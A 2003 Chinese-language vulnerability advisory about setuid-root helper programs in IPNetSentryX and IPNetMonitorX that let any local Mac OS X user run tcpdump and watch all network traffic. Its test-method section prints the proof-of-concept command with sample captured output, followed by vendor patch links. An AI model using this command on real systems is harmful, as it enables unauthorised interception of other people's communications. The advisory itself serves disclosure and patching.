IPNetSentryX/IPNetMonitorX未授权网络监视漏洞
发布日期:2003-08-07
更新日期:2003-08-12
受影响系统:Sustainable Softworks IPNetMonitorX
Sustainable Softworks IPNetSentryX
描述:
BUGTRAQ ID:
8365
IPNetSentryX和IPNetMonitorX是提供防火墙和网络监视功能的网络工具。
IPNetSentryX和IPNetMonitorX包含的RunTCPDump和RunTCPFlow没有正确限制用户的执行,任意本地用户可以利用这个漏洞监视网络通信。
RunTCPDump和RunTCPFlow是setuid root帮助应用程序,通过简单执行/usr/sbin/tcpdump 和/usr/local/bin/tcpflow来完成,这些帮助应用程序传递所有参数使用户执行tcpdump和tcpflow,存在漏洞是此程序没有对执行用户进行限制,任意对Mac OS X系统进行交互的用户可以通过IPNetSentryX或IPNetMonitorX 来执行命令,这就允许任意用户查看系统上的所有网络通信。
<*来源:Dave G. (
daveg@atstake.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=106029247015303&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Dave G. (
daveg@atstake.com)提供了如下测试方法:
bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000
建议:
厂商补丁:
Sustainable Softworks
---------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
Sustainable Softworks IPNetMonitorX :
Sustainable Softworks Upgrade IPNetSentryX and IPNetMonitorX Upgrades
http://www.sustworks.com/site/downloads.html
Sustainable Softworks IPNetSentryX :
Sustainable Softworks Upgrade IPNetSentryX and IPNetMonitorX Upgrades
http://www.sustworks.com/site/downloads.html浏览次数:2992
严重程度:0(网友投票)
